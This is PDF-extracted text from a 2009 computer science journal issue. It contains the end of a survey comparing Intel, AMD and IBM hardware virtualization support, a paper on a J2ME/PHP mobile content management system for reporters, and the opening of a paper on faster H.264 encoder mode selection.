hypervisor is to arbitrate access to the underlying physicalhost system’s resources so that multiple operating systemsthat are guests to VMM, can share them. IA-32 andItanium architecture were built on software-onlyvirtualization support [16]. But unfortunately they facedmany challenges while providing virtualization supports. Thesoftware cannot work properly in concern with the corehardware, that’s why it has to use complex schemes toimitate hardware features to the software. Moreover, it hasto make the illusion that the host operating system thinkingthe virtual machine as another application. To eliminate theseproblems, VMM designers developed new solutions likeXen [2] and Denali VMMs that use source levelmodification known as paravirtualization. But the main
limitation of this scheme is that it is applicable for a certainnumber of operating system. Hence Intel developed newarchitectures VT-x and VT-i for IA-32 processors (CoreDuo and Solo) and Itanium processors family respectivelywhich offered full virtualization using the hypervisorsupport. This new architecture enables VMM to run off-the-self operating systems and applications without any binarytranslation or paravirtualization. As a result it increasesrobustness, reliability and security.
B. AMD HARDWARE SUPPORT
AMD has introduced their new Quad-Core AMD OpteronProcessor (based on Pacifica specification) which is designed
to provide optimal virtualization. This processor provides anumber of features which enhances the performance andefficiency of the virtualization support. Firstly, AMD OpteronRapid Virtualization Indexing, which allows virtual machineto more directly manage memory to improve performance onmany virtualized applications [1]. It also decreases the“world-switch time” i.e. time spent switching from one virtualmachine to another. Secondly, direct CPU-to-memory, CPU-to-I/O, and CPU-to-CPU connections to streamline servervirtualization is ensured through AMD’s direct connectarchitecture. Thus, it is possible to host more VMs per serverand maximize the benefits of virtualization in terms of highbandwidth, low latency, and scalable access to memory.Thirdly, tagged Translation Look-Aside Buffer (TLB) has
increased responsiveness in virtualized environments.Actually, through Tagged TLB, AMD Opteron processormaintains a mapping to the VMs individual memory spaceswhich eliminates additional memory management overheadand reduces switching time of virtual machines. Finally,Device Exclusion Vector (DEV) performs security checks inhardware rather than software. DEV mechanism controlsaccess to virtual machine memory based on permission. Theseunique features have brought AMD to the frontline of battleon hardware virtualization support.
C. IBM HARDWARE SUPPORT
As the successor of POWER3 and POWER4, IBMintroduced advanced virtualization capabilities in IBMPOWER5 processors in 2004. This processor includesincreased performance and other functional enhancements of virtualization- reliability, availability, and serviceability inboth hardware and software levels [9]. It uses hypervisorwhich is the basis of the IBM virtualization technologies on
Powers systems. This technology provides fast page moverand simultaneous multithreading which finally extends thecapability of PPC5. It supports logical partitioning andmicro partitioning. Up to ten LPARs (logical partitions)can be created for each CPU. Thus the biggest 64-Waysystem is able to run 256 independent operating systems.Memory, CPU-Power and I/O can be dynamicallycontrolled between partitions. Thus, IBM PPC5 uses theparavirtualization or cooperative partitioning in con junctionwith the ATX, i5/OS, and Linux operating systems whichoffers minimal overhead [7]. This also ensures efficientresource utilization through recovery of idle processingcycles, dynamic reconfiguration of partition resources, andconsolidation of multiple operating systems on a single
platform and platform enforced security and isolation betweenpartitions. The latest processor of IBM with virtualizationsupport is IBM POWER6- the world’s fastest computerchip, features industry leading virtualization capabilities.This processor provides a number of attractive featuressuch as live partition mobility, expanded scalability,dynamic reallocation of resources etc. [6]. The LivePartition Mobility (LPM) feature allows clients to moverunning partitions automatically from one POWER6 serverto another without powering down the server. Moreover,clients can create up to 160 virtual servers in a single boxwhich provides much capability to run all kinds of differentworkloads (such as large scale database transactions to webservers) on the same server. IBM has built dynamic
reallocation capabilities in chip. Users or in some cases thechip, itself, can reallocate and reassign computing resourceswithin shared the environment. In addition to theseexclusive features, IBM POWER6 provides enhancedperformance, increased flexibility, application mobility etc.
IV. FUTURE CHALLENGES AND SUPPORTS
Though hardware virtualization support in currentprocessors has resolved many problems, it may also providenew solution for some future challenges. Extension of existing operating systems to present the abstraction of multiple servers is required for implementation of
virtualization at other levels of the software stack. Languagelevel virtualization technologies may be introduced by thecompanies to provide language run-times that interpret andtranslate binaries compiled for abstract architectures enableportability. Today Sun’s Java and Microsoft’s CLR VMMsdominate the market for language level virtualizationtechnologies [4]. Memory virtualization should be efficientenough to make frequent changes to their page tables.Moreover, research must look at the entire data center leveland surely significant strides will be made in this area in the
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550074
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 81/215
incoming decade. At present, the manual migration is onpractice, but the future should launch a virtual machineinfra-structure that automatically performs load balancing,detects impending hardware failures and migrates virtualmachines accordingly and creates and destroys virtualmachines according to demand for particular support. Tofacilitate these supports, the instruction sets should bechanged or new instructions should be added on which theprocessors can perform its jobs. Moreover, besides full andparavirtualization, pre-virtualization is a new technique thatclaims that it eliminates the guest-side engineering cost, yetmatches the runtime performance of paravirtualization [17].The virtualization will be useful for the industrial support,precisely for providing Grid services. At present, gridcomputing is gained prominence for its usage in physics,mathematics and medicine, to name just a few applications[10]. So grid computing or on-demand computing requiresthe virtualization support for taking the advantages of thistechnology in their shared computing environment.
V. DISCUSSION
This paper describes an important part of the currentcomputing systems as the present trend is to providemultiprocessor operating systems. The main objective of our study is to find out the current scenario of the hardwarevirtualization supports provided by various companies.From our survey, it is found that IBM is providing thebest hardware virtualization supports where highavailability, optimum system performance and efficiencyare ensured. The most important feature incorporated inIBM technology is that the users have much control onshared resources as it is possible to modify the memoryand I/O configurations in real time, without downtime,by the POWER6 server clients [6]. On the other hand,when IBM emphasizes on load balancing and live
partition mobility, AMD focuses on intercommunicationspeed and performance such as high-bandwidth, low-latency access to memory, high throughputresponsiveness for applications etc. Featuring AMDVirtualization technology with Rapid VirtualizationIndexing and Direct Connect Architecture, Quad-CoreAMD Opteron processors enable industry leadingvirtualization platform efficiency [1]. Intel, the giantmicroprocessor manufacturer improves the existingsoftware-only virtualization solutions by enhancing thereliability, supportability, security and flexibility of virtualization solutions. Intel is working on increasedhardware virtualization supports for both server anddesktop computer. However, the table 5.1 shown in the
next page addresses some important features of Intel,AMD and IBM processor with virtualization support.
From the table, it is clear that IBM POWER6 is themost powerful machine with enhanced virtualizationcapabilities. The fastest microprocessor used inPOWER6 has hit speed of 6Hz, for the first time ever.Although IBM offers better output as it uses robusthardware support for virtualization, it is more costly thanIntel and AMD. The user interaction also makes a securityhole and vulnerable to the intruders. The virtualization
technologies offered by Intel and AMD are not compatible,but each offers similar functionalities. These virtualization-friendly extensions for the x86 architecture essentially providethe foundation to maximize the efficiency and capabilities of software virtualization.
All microprocessor manufacturer companies are interestedto enhance their virtualization capabilities. The main reasonbehind that hardware virtualization reduces the cost and
provides reliability, availability & scalability. However, theconcentration is more on server than the desktop computers asserver machine requires more processing capacities. The table5.2 in the next page shows the TPC Benchmark results(www.tpc.org) of AMD, Intel and IBM system with two serverprocessors.
This table indicates that IBM P6 provides the bestperformance among all as well as it results in highest price.IBM P6 can perform 404462 transactions per minute while itis 273666 for Intel. On the other hand, AMD is less than half of total transactions per minute performed by Intel. In terms of price, IBM P6 system costs four times more than Intel whileAMD is almost same as Intel.
Finally, the question is which forthcoming technology is
going to overwhelm the others. The answer is hardwareassisted virtualization techniques will dominate over all. FromPower 5, IBM provides micro-partitioning and specialtechnology for dynamic resource allocation. Again, AMDOpteron introduces tagged TLB, and Direct ConnectArchitecture which is designed for dedicated memory accessand efficient switching between virtual machines. Theintegrated memory controller of AMD Opteron also improvesoverall virtualization performance and efficiency. And themost exciting news is that Intel also switches to hardwareassisted virtualization techniques from their Intel Quad CoreXeon processor (7400 Series) which includes Intel VTFlexPriority for interrupt handling and Virtual MachineDevice Queues (VMDq) to off-load the network I/O
management burden and freeing processor cycles andimproving overall performance. So, there is no doubt that thenext advancement of hardware virtualization technology willbe fully based on hardware assisted techniques.
VI. CONCLUDING REMARKS
Some problems that must be specified which we facedcontinuing the study. Firstly, to achieve the exact result it isrequired to get access in real hardware and it is not possible.Secondly, the SPEC results is not specific to virtualizationsupport only, it includes the virtualization features withinprocessors. So the performance measurement partly takesthe virtualization support in consideration. But the goodnews is that Standard Performance Evaluation Corporation(SPEC) has created a working group to address thedevelopment of a set of industry standard methods to compareperformance of virtualization technologies. Current membersof the working group include AMD, Dell, Fujitsu Siemens,Hewlett-Packard, Intel, IBM, Sun Microsystems, SWsoft(NowParallels) and VMware [15]. So, to draw a sound and moreaccurate conclusion we have to wait few more days. But thispaper will definitely provide the basis to explore one’s journeytowards hardware virtualization.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550075
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 82/215
Table 5.1: Comparative view of Intel, AMD and IBM virtualization support based on SPEC evaluation [15].
CharacteristicsIntel Xeon 7000
Series Processors
AMD Opteron
Processors
IBM POWER6
Processors
Hardware Assisted
Virtualization
Intel Virtual
Technology (VT)
AMD-V with Rapid
VirtualizationIndexing
Live Partition Mobility
(LPM)
Modular, Glueless,
ScalabilityRequires Northbridge Yes
Yes, supports up to 160
virtual servers
SMP CapabilitiesUp to 4 Sockets/ 16
Cores
Up to 8 Sockets/ 32
CoresUp to 8 Sockets/ 16 Cores
User Interaction No No
Yes, user can create VMs
which span the entire
system
Server/
Application DowntimeYes Yes
No, Sustain system
availability during
maintenance or re-hosting
Concurrent firmware
and Operating System
Updates
No NoYes, even when
applications are active
Table 5.2: TPC Benchmark results with price and performance (based on SPEC)
Spec
Revision
tpmC
(transacti
on per
minute)
Price/P
erform
ance
Total System
Cost (USD)Server CPU Type
Total
Server
CPU's
Total
Server
Processors
Total
Server
Cores
Total
Server
Threads
5.6 113628 2.99 338730AMD Opteron –
(2.6 GHz)2 2 4 4
5.9 273666 1.38 376910Intel Quad-CoreXeon Processor
X5460 (3.16GHz)2 2 8 8
5.8 404462 3.51 1417121IBM Power6 (4.7
GHz)2 2 4 8
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550076
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 83/215
REFERENCES
1. [AMD], Product Brief: Quad-Core AMD Opteron Processor, Web: http://www.amd.com/us-en/Processors/ProductInformation
/0,,30_118_8796_15223,00.html, Last checked: 24 October, 2008.
2. [Barham, Dragovic, Fraser, Hand, Harris, Ho, Neugebauer, Pratt,Warfield], Xen and the art of virtualization, by Paul Barham, BorisDragovic, Keir Fraser, Steven Hand, Tim Harris, Alex Ho, Rolf
Neugebauer, Ian Pratt and Andrew Warfield , October 2003,Proceedings of the nineteenth ACM symposium on Operatingsystems principles, Published by - ACM press.
3. [Eggers, Emer, Levy, Lo, Stamm and Tullsen], Simultaneousmultithreading: A platform for the next generation processor, by S. JEggers, J. S. Levy, J. L. Lo , R. L. Stamm and D.M.Tullsen , IEEEMicro, 17 (5):12 -19, 1997.
4. [Fiqueriredo, Dinda, Fortes], Guest Editors’ Introduction ResourceVirtualization Renaissance, by Renato Fiqueriredo, Peter A. Dindaand Jose Fortes, IEE Computer, Publication:May 2005, Volume: 38,Page(s): 28 -31, ISSN: 0018-9162
5. [Hammond, Nayfeh and Olukotun], A single-chip multiprocessor ,by L.Hammond, B. A. Nayfeh and K. Olukotun, Computer, 30(9):79
-85, 1997.
6. [IBM], FACT SHEET : IBM POWER6 VIRTUALIZATION, Web:http://www-05.ibm.com/il/takebackcontrol/systemp/downloads/ POWER6_Fact-Sheet-052507.pdf, Last checked: 24 October, 2008.
7. [IBM], IBM Journal of Research and Development , by IBM, WebPage: http://www.research.ibm.com/journal/rd/494/armstrong.html,Last Checked: 24 October, 2008.
8. [Kahle], Power4: A dual. CPU processor chip, by J. Kahle, inproceedings of the 1999 International Microprocessor, San Jose, CA,October 1999.
9. [Kalla, Sinharoy, Tendler], IBM Power5 chip: a dual-core
multithreaded processor , by Ron Kalla, Balaran Sinharoy and JoelM. Tendler, IEEE Micro, Publication: May -April, 2004, Volume 24 ,Page(s): 40-47 , ISSN: 0272-1732.
10.[Kiyanclar], A Servey of virtualization techniques Focusing onSecure On-Demand Cluster Computing, by Nadir Kiyanclar,University of Illinois, Urbana Champaign, Research of NationalCenter for Supercomputing Applications. May 17, 2006.
11. [Kågström, Lundberg and Grahn], The Application Kernel Approach- a Novel Approach for Adding SMP Support toUniprocessor Operating Systems, by Simon Kågström, LarsLundberg and Håkan Grahn, 18th International Parallel andDistributed Processing Symposium , 2004. Pg. 1-3..
12. [Marr, Binns, Hlill, Hinton, Koufaty, Miler, and Upton],
Hyperthreading technology architecture and microarchitecture, byD. Marr, F. Binns ,D. L. Hlill, G. Hinton, D.A Koufaty , J. A. Miler,and M. Upton, Intel Technology Journal, 6(1):4-15, February 2002.
13. [Rose], Survey of System Virtualization Techniques, by RobertRose, Published:March 8, 2004, Web Page:http://www.robertwrose.com/vita/rose-virtualization.pdf, Lastchecked: 24 October, 2008.
14. [Rosenblum], The Reincarnation of Virtual Machine, by MendelRosenblum, Volume 2, Year of publication- 2004, ISSN:1542-7730,ACM press. New York, USA.
15. [SPEC], SPEC Results-2006 [Processors], Web Page:http://www.spec.org/, Last checked: 24 October, 2008.
16. [Uhlig, Neiger, Rodgers, Santoni, Martins, Anderson, Bennett,Kagi, Leung, Smith], Intel Virtualization Technology, by Rich Uhlig,Gil Neiger, Dion Rodgers, Amy L. Santoni, Fernando C.M. Martins,Andrew V. Anderson, Steven M. Bennett, Alain Kägi, Felix H.Leung, Larry Smith, Intel Corporation . Published by IEEE, Volume38, Issue 5, May, 2005, page(s): 48 -56.
17. [Vasseur, Uhlig , Chapman, Chubb, Leslie, Heiser] Pre-Virtualization: Slashing the Cost of Virtualization, by JoshuaVasseur, Volkmar Uhlig , Matthew Chapman , Peter Chubb, BenLeslie, Gernot Heiser, Technical report 2005: 30 November, 2005,Fakultät fur Informatik, Universität Karlsruhe (TH).
__________________________________________________
Kamanashis Biswas, born in 1982, post graduatedfrom Blekinge Institute of Technology, Sweden in2007. His field of specialization is on Security
Engineering. At present, he is working as a Senior Lecturer in Daffodil International University,Bangladesh.
Md. Ashraful Islam, is post graduated fromAmerican Liberty University, UK. Now he isworking as an Assistant Professor in BangladeshIslami University. His major area of interest issoftware engineering, e-learning and MIS.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550077
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 84/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
Dynamic Multimedia Content Retrieval System in
Distributed Environment
R. Sivaraman
Deputy DirectorCenter for convergence of
technologies
Anna University Tiruchirappalli
Tiruchirappalli, India
e-mail: rs@tau.edu.in
R. Prabakaran
Lecturer,Department of Electrical and
Electronics Engineering
Anna University Tiruchirappalli
Tiruchirappalli, India
e-mail: hiprabakaran@gmail.com
S. Sujatha
Lecturer,Department of Computer Science
and Engineering
Anna University Tiruchirappalli
Tiruchirappalli, India
e-mail: ssujtha71@yahoo.co.in
Abstract— WiCoM enables remote management of web
resources. Our application Mobile reporter is aimed at
Journalist, who will be able to capture the events in real-time
using their mobile phones and update their web server on the
latest event. WiCoM has been developed using J2ME technology
on the client-side and PHP on the server–side. The
communication between the client and the server is established
through GPRS.
Mobile reporter will be able to upload, edit and remove
both textual as well as multimedia contents in the server.
Keywords: wireless content management system; smart mobile
device; J2ME; client-server architecture.
I. INTRODUCTION
A content management system (CMS) is a system used tomanage the content of a Web site. Typically, a CMS consistsof two elements: the content management application (CMA)and the content delivery application (CDA). The CMAelement allows the content manager or author, who may not
know Hypertext Markup Language (HTML), to manage thecreation, modification, and removal of content from a Website without needing the expertise of a Webmaster. The CDAelement uses and compiles that information to update the Website. The features of a CMS system vary, but most includeWeb-based publishing, format management, revision control,and indexing, search, and retrieval.
The Web-based publishing feature allows individuals touse a template or a set of templates approved by theorganization, as well as wizards and other tools to create ormodify Web content. The format management feature allowsdocuments including legacy electronic documents and scannedpaper documents to be formatted into HTML or PortableDocument Format (PDF) for the Web site. The revision
control feature allows content to be updated to a newer versionor restored to a previous version. Revision control also tracksany changes made to files by individuals. An additionalfeature is indexing, search, and retrieval. A CMS systemindexes all data within an organization. Individuals can thensearch for data using keywords, which the CMS systemretrieves.
WiCoM is a wireless application aimed at helping thegeneral administration of cyber contents while being on the
move. It is a wireless cyber content management softwarerunning on a java enabled mobile device having GPRSconnectivity. It finds application in news reporting agency toadminister news site in real-time.
A reporter arriving at the site of the event can record the
news of the current scenario from the various sources. He cantake snaps, audios and videos and upload them right at themoment to the web-server making it available to the world inno time. There are options to edit/delete and thus providevarious content management related features. Also, a modifiedversion of it can be useful for e-commerce sites and onlineshopping sites too.
II. RELATED WORK
The integrated Content Management System (CMS) is arobust, easy-to-use web content manager built upon a flexibleapplication framework; this framework was developed usinginexpensive, open-source resources. It enables users to easily
collaborate on creating and maintaining web site content, andprovides the contractual relationships between the roles of website developers, graphic designers, and managers, ensuringquality and integrity of content at all times.
CMS is suitable for just about any web site model, such asnews publications, customer support interfaces, Web portals,communities, project management sites, intranets, andextranets. Features include role definitions and workflowcustomizability, integrated searchable help, a clean modularsystem for extending the administrative interface, front-endcontent editing, embedding components into pages, emaildistribution lists, a news application, discussion forums, andmuch more. Planned enhancements include contentsyndication and aggregation, advanced role definitions andworkflow customizability and modules. CMS currentlyrequires PHP and Apache. It has been tested on Linux andWindows environments; and while not currently supported, itshould run on MacOS X as well. The system natively runs ona MySQL database; however, by using the integrated databaseabstraction layer, it is possible to use most popular databasesystems including Oracle, Interbase, MySQL and MS SQLServer.
ISSN 1947 550078
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 85/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. XXX, No. XXX, 2009
III. DEVELOPMENT ENVIRONMENT
The Integrated Development Environment (IDE) chosenwas Netbeans 6.0, an open source project that was developedin order to provide a vendor neutral IDE for developingsoftware. This ran on top of the Java SDK1.4_12 whichimplements functionality that aids in the development of J2ME applications. This functionality includes fullyintegrating the Java wireless toolkit, which provides
configurations and profiles for mobile development. The plug-in also integrates the MIDP2 emulator that is provided withthe wireless toolkit which can then be launched from withinNetbeans 6.0.
Figure1: Data flow diagram
IV. SYSTEM STRUCTURE
The structure of the system is divided into two components:
The client-side MIDlet application which resides onthe mobile phones,.
The server-side PHP/MySQL based application.
1. Client Side
The client-side system is a MIDlet application whichserves as an interface to feed in the contents and controlinstructions which is interpreted on the server and theappropriate action is taken. The MIDlet has the task of creating textual news contents,
Creating media contents as well as editing and updatingtextual news contents. The news creation task is done througha data entry interface which contains various sections to befilled. Once done the data is uploaded to the server and storedin the database server.
The media news capture is the most important section of the MIDlet application. It has options to capture pictures,audios as well as videos for the devices that support it. Thesemedia can then be uploaded to the server and stored in aparticular directory structure. Another most important sectionof the MIDlet is the News Manager, i.e., the section that helps
edit and update news contents posted earlier. It has a searchoption to search for the relevant news and then bring about achange in it. Once the change is confirmed it is updated ontothe database on the server
Figure 2:.Communication between MIDlet and server application
Server Side
The server-side system comprises of a web-server, i.e.,apache. The scripts are PHP-based while the backend database
server is MySQL. The news contents control instructions sentby the MIDlet client is received at the server end andprocessed by the respective PHP script.
The PHP scripts that handle the MIDlet interactionperform various database based queries and also helps in thegeneration of xml based data to be consumed by the MIDlet. Itis also responsible for dumping of media data properly. Theuse of xml provides ease in the generation of data for theconsumption by the MIDlet. The user-interface is a simpleweb interface which displays the news contents by fetchingthem from the server depending on the criteria. The admin-interface is basically for administering the news contents fromthe desktop.
V. COMMUNICATION
Wireless content management is a client – serverarchitecture based system, the information flow is notstandalone, rather it goes through the network and hence acommunication media is needed. The J2ME MIDLets canoperate over, and make use of the WAP stack to performHTTP network interaction, without requiring TCP/IP. Sincethe server application resides on a remote machine aconnection needs to be established between the mobile deviceand the remote server which can be accomplished with the useof the phones with GPRS connection.
VI. SYSTEM IMPLEMENTATION
The application begins working from the MIDlet which isthe source for input of news content. As the MIDlet is openeda welcome screen is encountered which is followed by a LoginForm. Login Form becomes important because of the fact thatthe system will be used for administration and will requireentry into a restricted area of the web-site.
Once the user is authenticated properly the main menubecomes visible and the user can perform the requiredoperations. Once the data is filled completely the upload
ISSN 1947 550079
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 86/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. XXX, No. XXX, 2009
button can be pressed to bring us to the next screen where theconfirmation of data is made. Once done we can send the datato the server by pressing the start button.
The media creation handles the creation of multimediafiles, such as, pictures, audios and videos. The camera isinitialized by use of various APIs in the MMAPI, e.g., JSR135.Once the file is created it is transferred over the http to theremote server as multipart/form-data.
The News Manager, i.e., the editing and updating sectionof the application is one of the most important sections. Oncethe update section is opened the user is provided with a screenwhere he can enter search keyword as well as the search typesuch as title, news text or author name. Accordingly the searchis performed on the server and all results matching the criteriaare fetched. Since the size of the mobile screen is small thedata is broken into segments, each containing five types of news in full. This news segment of five is then transmitted tothe MIDlet from the server in xml format. In case when morepages exist, the news manager has an extra command option“NEXT” to jump onto the next page else the option is notavailable.
The use of xml is governed by the kXML parser which isa low footprint xml parser for mobile devices. The clientapplication discussed above was tested on the emulatorprovided by J2ME wireless toolkit version 2.2 using JAVASDK 1.4.2_12.
Together with the client-server based system workingbetween the mobile device and the server there is another web-based mobile independent part of this application. This is thewebsite which allows the user to look through various newscontents.
There is an admin interface as well for managing fewfeatures of the news like activating /deactivating the newsfrom being viewed and also for deleting. Along with all thesethere is an installation of PHP script, which allows the user toproperly configure the server side of the application and set itup properly with ease. The server side of the application isimplemented using PHP 5.2 as the language and MySQL 4.1as the database server with the use of apache 2.0.8 (forwindows) as web-server.
VII. SYSTEM DESIGN AND RESULT ANALYSIS
1. Server Modules
1) User Registration: User Registration has the screens for
registering new users for uploading messages to the server.
The registration form gets the information from the user suchas first name, last name, user name, password and etc. The
new users will informed if they made any errors when they fill
the form. If the required information is filled then the new user
registration conformed to “registration successful” message.
2) Message Creator: Message Creator has the screens for
creating the messages on the web server via the web interface.
The users can use the different styles like the windows word
for creating the text multimedia message. Users can upload
their audio and image files using this module.
3) Message Viewer: Message Viewer is used to view the
uploaded messages on the main page of the Server site. The
messages are arranged as descending order according their
upload time with the attached image. The message title has the
link which leads to the separate page for viewing the full
message.
Client Modules
1) Message Creator: Message Creator is used to create the
message using the mobile phone. This module divided into
three sub modules namely Text Message Creator, Multimedia
Content Creator and Message Uploader. These sub modules
described below.
Text Message Creator - has the form for getting the
Message Title, Content, and Place and Category information.
In this form if the specified message categories already exist
on the server, then the uploaded message will placed under the
specified category on the server web site.
Multimedia Content Creator - has the forms for capturing
the image using the mobile phone camera and record the audio
using the mobile phone microphone. The captured image
stored locally on the mobile in the format of jpeg. The
recorded audio stored in the format of mp3.
2) Message Up Loader: This Message up loader is used to
upload the text and the multimedia content to the server. This
module has the form which shows the progress of the upload
status using the Gauge control. The text message has the
higher priority, so it uploaded first, then the multimedia
content uploaded finally. This module has the menu option for
saving the uploaded message locally with the attachment.
3) RSS Reader: RSS Reader module is used to view the
contents of the server. The messages on the server arearranged under message categories. This form displays the
categories on the mobile screen. The message titles are
displayed when the user clicked the category. The full
message without the attachment is displayed when the user
clicks the message title.
4) Message Editor: Message Editor is used to edit the
previously stored messages and upload the edited messages to
the server. If the already stored the created messages then the
new menu item is created with the name of “Saved Items” on
the main menu. This menu used to traverse the previously
stored messages.
5) Configurator: Configurator has the form to get the User
Name, Password and Server URL from the server. This formdisplayed as the first page when the user uses this software for
the first time. This information will be modified via the “Edit
Data” menu.
ISSN 1947 550080
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 87/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. XXX, No. XXX, 2009
Figure 3. J2ME Display
VIII. CONCLUSION
In this paper we have presented a multimedia applicationdeveloped using java micro edition, PHP/MySQL on theserver side. The use of XML was a good idea keeping in mindthe future scope of the project. The application is one of itskinds and finds huge application in news reporting agenciesand e-commerce sites. An advanced version of the application
is in progress which is a more generalized mobile CMS andeligible for a large scale deployment.
More functions can be added from the prototype design toachieve game content, animation content and movie content.The CMS can also be extended to CDMA technology tosupport various group of mobile phones. In future, we canthink of downloading the content from server to client devicefor later offline use
REFERENCES
[1] Wireless Content Management (WiCoM) for Mobile
Device Vikram Kumar vikram_gnext@rediffmail.com,
Koushik Majumder koushikmail@yahoo.com, School of
Information Technology West Bengal University of
Technology, BF-142, Sector I, Salt Lake Kolkata-700064
[2] Symbian OS, the Mobile Operating System,
http://developer.symbian.com/main/oslibrary/indin.jsp
[3] Nokia Symbian OS Basics Nokia Developer Training
Course Pack, http://www.nokia.com/
[4] C. Enrique Ortiz, Generic Connection
Framework,http://developers.sun.com/techtopics/mobility /midp/articles/genericframework/
[5] kXML Project, http://kxml.sourceforge.net/.
ISSN 1947 550081
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 88/215
Enhanced Mode Selection Algorithm for
H.264 encoder for Application in Low
Computational power devices
Sourabh RungtaCSE Department.
RCET,
Durg, India.
E-mail: sourabh@rungta.org
Kshitij VermaABV-IIITM,
Gwalior, India.
Email: vermaksh@gmail.com
Neeta TripathiECE Department.
RSRCET,
Durg, India.
E-mail: neeta_31dec@rediffmail.com
Anupam ShuklaICT Department.
ABV-IIITM,
Gwalior, India.
E-mail: dranupamshukla@gmail.com
Abstract— The intent of the H.264/AVC project was to
create a standard capable of providing good video
quality at substantially lower bit rates than previous
standards without increasing the complexity of design so
much that it would be impractical or excessively
expensive to implement. An additional goal was to
provide enough flexibility to allow the standard to be
applied to a wide variety of applications. To achieve
better coding efficiency, H.264/AVC uses several
techniques such as inter mode and intra mode predictionwith variable size motion compensation, which adopts
Rate Distortion Optimization (RDO). This increases the
computational complexity of the encoder especially for
devices with lower processing capabilities such as mobile
and other handheld devices. In this paper, we propose an
algorithm to reduce the number of mode and sub mode
evaluations in inter mode prediction. Experimental
results show that this fast intra mode selection algorithm
can lessen about 75% encoding time with little loss of bit
rate and visual quality.
Keywords:- H.264, RDO, Inter-Frame Prediction, Sub- Mode Selection.
I INTRODUCTION
H.264 is the emerging video coding standard with
enhanced compression performance when compared to other
existing coding standards to achieve outstanding coding
performance, H.264/AVC employs several powerful coding
techniques such as 4x4 integer transform, inter-prediction
with variable block-size motion compensation, motion
vector of quarter-pel accuracy, in-loop deblocking filter,
improved entropy coding such as context-adaptive variable-
length coding (CAVLC) and content-adaptive binary
arithmetic coding (CABAC), enhanced intra-prediction,
multiple reference picture, and the forth. Due to this new
features, encoder computational complexity is extremely
increased compared to previous standards. This makes
H.264/AVC difficult for applications with low
computational capabilities (such as mobile devices). Thusuntil now, the reduction of its complexity is a challenging
task in H.264/AVC.
As recent multimedia applications (using various types of
networks) are growing rapidly, video compression requires
higher performance as well as new features. H.264 emerged
as the video coding standard with enhanced video
compression performance when compared to other existing
coding standards. It outperforms the existing standards
typically by a factor of two. Its excellent performance is
achieved at the expense of the heavy computational load in
the encoder. H.264/AVC has gained more and more
attention; mainly due to its high coding efficiency (theaverage bitrate saving up to 50% as compared to H.263+
and MPEG-4 Simple Profile), minor increase in decoder
complexity compared to existing standards, adaptation to
delay constraints (the low delay mode), error robustness,
and network friendliness.
H.264/AVC employs several powerful coding techniques
such as 4x4 integer transform, inter-prediction with variable
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550082
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 89/215
block-size motion compensation, motion vector of quarter-
pel accuracy, in-loop deblocking filter, improved entropy
coding such as context-adaptive variable-length coding
(CAVLC) and content-adaptive binary arithmetic coding
(CABAC), enhanced intra-prediction, multiple reference
picture, and the forth. Note that DCT coefficients of intra-
frames are transformed from intra prediction residuals
instead of transforming directly from original image content.Especially, for the inter-frame prediction, H.264 allows
blocks of variable size seven modes of different sizes in all,
which are 16x16, 16x8, 8x16, 8x8, 8x4, 4x8 and 4x4, that
can be used in inter-frame motion estimation/compensation.
These different block sizes actually form a one or two level
hierarchy inside a macroblock are supported along with the
SKIP mode [1], as shown in Figure 1. Hence the
computational complexity of motion estimation increases
considerably as compared with previous standards. This is
one major bottleneck for the H.264 encoder.
Figure 1.Macroblocks and Sub-macroblock partitions.
H.264 supports various intra-mode and inter-mode
prediction techniques among which most of them contribute
to the coding efficiency. Lagrangian RDO method is used to
select the best coding mode of intra and inter prediction with
highest coding efficiency [4]. In Inter prediction tree-
structured multi-block sizes i.e. seven modes with different
block sizes is supported by this standard. H.264 tests the
encoding process with all possible coding modes of inter-
coding, and calculates their RD costs to choose the mode
having the minimum cost. RDO technique involves a lot of
computations. The reference implementation [7] of H.264
uses a brute force search for inter mode selection which is
extremely computational constraining. Therefore there is an
obvious need for reducing the amount of modes that are
evaluated in order to speed up the encoding and hence to
reduce the complexity of the encoder.
II INTRA- AND INTER-FRAME SELECTION
The two coding modes in H.264 are intra-frame
coding and inter-frame coding. Intra-frame coding supports
two classes which are denoted as Intra4x4 and Intral6x16.
When the subsequent frames of the video sequence have
comparably large difference among them (such as in case of
scene change), Intra-frame coding [1] would be selected in
order to achieve outstanding coding performance, many
advanced techniques are used. In these techniques, intramode plays a vital role because it can eliminate spatial
redundancy remarkably. In luma component, intra
prediction is applied for each 4×4 block and for a 16×16
macroblock. There are 9 modes for 4×4 luma block, 4
modes for 16×16 luma block and 4 modes for 8×8 chroma
block. In order to obtain the best coding performance, a very
time-consuming technique named RDO (rate distortion
optimization) is used. It computes the real bit-rate and
distortion between original and reconstructed frames for
each mode. Then it calculates the RDcost based on
Lagrangian rate distortion formula. The mode which has the
minimum RD cost will be chosen as the final coding mode.
Therefore, the computational load of this kind of exhaustingsearching algorithm is not acceptable for real-time
applications.
